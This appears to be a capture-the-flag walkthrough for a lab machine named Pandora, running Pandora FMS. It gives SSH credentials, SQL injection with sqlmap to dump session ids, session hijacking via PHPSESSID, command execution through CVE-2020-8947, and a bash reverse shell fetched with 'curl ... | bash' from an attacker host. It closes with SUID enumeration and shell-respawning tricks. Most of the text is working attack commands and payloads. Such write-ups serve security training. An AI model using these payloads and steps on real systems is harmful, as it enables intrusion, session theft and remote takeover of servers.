Pandora

Target: 10.129.134.46
ssh daniel@10.129.134.46
Password: HotelBabylon23

Session ID recovered from the tsessions_php dump (see sqlmap below): g4e01qdgk36mfdh90hvcc54umq

Configure port forwarding (local port 8989 -> port 80 on the target, reachable only from the box itself)

ssh -fgN -L 8989:localhost:80 daniel@10.129.134.46

Configure proxychains

sudo vim /etc/proxychains.conf
[ProxyList]
# add proxy here ...
# meanwhile
# defaults set to "tor"
# socks4    127.0.0.1 9050
socks5 127.0.0.1 9098 daniel HotelBabylon23

Note: this entry expects a SOCKS5 listener on 127.0.0.1:9098. The -L forward above does not create one; a dynamic forward does (ssh -fN -D 9098 daniel@10.129.134.46). The sqlmap command below talks to the forwarded port 8989 directly and does not go through proxychains.

sqlmap

The session_id parameter of chart_generator.php is injectable. Dump the tsessions_php table to recover live session ids (the id_session column), which can then be reused as a PHPSESSID cookie.

sqlmap --url="http://10.129.134.46:8989/pandora_console/include/chart_generator.php?session_id=''" -D pandora -T tsessions_php --dump --batch

CVE-2020-8947 (command execution via event responses)

Requires a valid session: send the hijacked session id as the PHPSESSID cookie. The value of target= is executed on the server.

POST /pandora_console/ajax.php HTTP/1.1
Cookie: PHPSESSID=g4e01qdgk36mfdh90hvcc54umq
Content-Type: application/x-www-form-urlencoded

page=include%2fajax%2fevents&perform_event_response=10000000&target=whoami&response_id=1

Reverse shell

$ cat shell.sh
#!/bin/bash
bash -i >& /dev/tcp/10.10.14.6/1337 0>&1

$ ls
shell.sh

Serve the script over HTTP:

$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...

Listen on the port shell.sh connects back to:

$ nc -nvlp 1337

payload

The command to run on the target is

curl 10.10.14.6:80/shell.sh | bash

which goes into the target= parameter form-encoded (spaces become +, the pipe becomes %7c):

page=include%2fajax%2fevents&perform_event_response=10000000&target=curl+10.10.14.6:80/shell.sh%7cbash&response_id=1

Privilege escalation

Find all files with the SUID bit set (-type f skips directories, which are never relevant here):
$ find / -type f -perm -4000 2>/dev/null
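The same enumeration as a script that also does the triage step a practitioner wants: separate the SUID binaries every stock Ubuntu install ships from the ones that were added, such as /usr/bin/pandora_backup here. Added example, not from the writeup; the STOCK_SUID list is a hand-picked baseline and not exhaustive, so treat anything it does not filter as a candidate to look at, not as proof of a bug.

```python
#!/usr/bin/env python3
"""Enumerate SUID binaries (what `find / -type f -perm -4000` does) and flag
the ones outside a stock baseline. Added example."""
import os
import stat

# Baseline of SUID binaries present on a stock Ubuntu 20.04 install
# (hand-picked assumption, not exhaustive). /bin is a symlink to /usr/bin there.
STOCK_SUID = {
    "/usr/bin/sudo", "/usr/bin/su", "/usr/bin/passwd", "/usr/bin/chsh",
    "/usr/bin/chfn", "/usr/bin/gpasswd", "/usr/bin/newgrp", "/usr/bin/mount",
    "/usr/bin/umount", "/usr/bin/fusermount", "/usr/bin/pkexec", "/usr/bin/at",
    "/usr/lib/dbus-1.0/dbus-daemon-launch-helper",
    "/usr/lib/openssh/ssh-keysign",
    "/usr/lib/policykit-1/polkit-agent-helper-1",
    "/usr/lib/eject/dmcrypt-get-device",
}

# Pseudo-filesystems that only waste time when walked from /.
SKIP_DIRS = {"proc", "sys", "dev", "run"}


def find_suid(root: str = "/") -> list:
    """Return sorted paths of regular files under root that have the SUID bit set."""
    found = []
    for dirpath, dirnames, filenames in os.walk(root, onerror=lambda e: None):
        if os.path.abspath(dirpath) == os.path.abspath(root):
            dirnames[:] = [d for d in dirnames if d not in SKIP_DIRS]
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)  # lstat: do not follow symlinks
            except OSError:
                continue  # unreadable or vanished; same as find's 2>/dev/null
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                found.append(path)
    return sorted(found)


def is_unusual(path: str) -> bool:
    """True for any SUID binary not in the stock baseline."""
    return path not in STOCK_SUID


def triage(paths) -> list:
    """Keep only the non-stock entries; these are the privesc candidates."""
    return [p for p in paths if is_unusual(p)]


if __name__ == "__main__":
    all_suid = find_suid("/")
    for p in all_suid:
        st = os.lstat(p)
        marker = "!!" if is_unusual(p) else "  "
        print(f"{marker} {oct(st.st_mode & 0o7777)} uid={st.st_uid} {p}")
    print(f"\n{len(triage(all_suid))} non-stock SUID binaries of {len(all_suid)} total")
```

On this box the non-stock entry is /usr/bin/pandora_backup, which is the binary examined next.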


The non-stock SUID binary is pandora_backup; check its owner and mode, then run it:

$ ls -al /usr/bin/pandora_backup

$ /usr/bin/pandora_backup

If the binary does not behave from the shell obtained via the web server, re-spawn a shell as an at job attached to the current tty. The job runs as a fresh process outside the web server's process tree, so it does not inherit that shell's restrictions; tail -f keeps the foreground process alive so the terminal stays usable:

$ echo "/bin/sh <$(tty) >$(tty) 2>$(tty)" | at now; tail -f /dev/null

Upgrade to a proper pty:

$ python -c "import pty;pty.spawn('/bin/bash')"